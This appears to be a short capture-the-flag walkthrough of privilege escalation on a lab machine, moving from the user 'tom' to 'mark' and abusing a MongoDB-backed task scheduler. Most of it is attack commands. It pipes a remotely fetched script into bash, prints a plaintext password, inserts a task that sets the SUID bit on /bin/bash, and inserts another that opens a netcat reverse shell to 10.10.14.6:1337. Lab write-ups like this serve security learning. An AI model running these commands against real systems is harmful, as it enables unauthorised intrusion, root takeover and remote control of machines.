tom

find / -type f -perm -04000 -ls 2>/dev/null

curl http://10.10.14.6/linenum.sh | bash

cat /var/scheduler/app.js

Looks like it will run a command (system command) as a child process then delete the task

mark:5AYRft73VtFpc84k

mark@node:~$ mongo -p -u mark scheduler
MongoDB shell version: 3.2.16
Enter password: 
connecting to: scheduler
> db.tasks
scheduler.tasks
> db.tasks.insert( {"cmd" : "cp /bin/bash /tmp/adot8; chmod 6755 /bin/bash;" } )
WriteResult({ "nInserted" : 1 })
> db.tasks.find()
{ "_id" : ObjectId("6661beb7ec323c4579a20eae"), "cmd" : "cp /bin/bash /tmp/adot8; chmod 6755 /bin/bash;" }
> db.tasks
scheduler.tasks
>

mark@node:/tmp$ mongo -p -u mark scheduler
MongoDB shell version: 3.2.16
Enter password: 
connecting to: scheduler
> db.tasks.insert( {"cmd" : "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.6 1337 >/tmp/f" } )
WriteResult({ "nInserted" : 1 })
> db.tasks.find()
>

PreviousPriv Esc Nextroot

Last updated 1 year ago

Was this helpful?